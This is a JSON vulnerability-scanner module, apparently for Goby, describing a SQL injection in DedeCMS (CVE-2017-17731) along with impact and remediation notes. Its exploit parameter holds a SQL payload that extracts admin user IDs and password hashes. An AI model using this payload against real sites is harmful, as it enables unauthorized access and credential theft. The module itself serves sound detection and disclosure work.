{ "Name": "DedeCMS recommend.php SQLi (CVE-2017-17731)", "Description": "DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.\\n", "Product": "DedeCMS", "Homepage": "http://www.dedecms.com/", "DisclosureDate": "2021-06-15", "Author": "sharecast.net@gmail.com", "GobyQuery": "app=\"DedeCMS\"", "Level": "2", "Impact": "
Hackers can execute SQL statements directly, so as to control the whole server: data acquisition, data modification, data deletion, etc.
1. Strictly filter user-supplied input in the web code.
2. Deploy a web application firewall to monitor database operations.
3. Upgrade to the latest version.
", "References": [ "https://github.com/fengxuangit/dede_exp_collect/blob/master/dede_recommend.php_sqli.py" ], "HasExp": true, "ExpParams": [ { "name": "cmd", "type": "input", "value": "select CONCAT(0x7c,userid,0x7c,pwd)+from+~#@__admin~ limit+0,1" } ], "ExpTips": { "Type": "text", "Content": "Replace backticks with ~" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": null, "Tags": [ "SQL Injection" ], "CVEIDs": ["CVE-2017-17731"], "CVSSScore": "0.0", "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null } }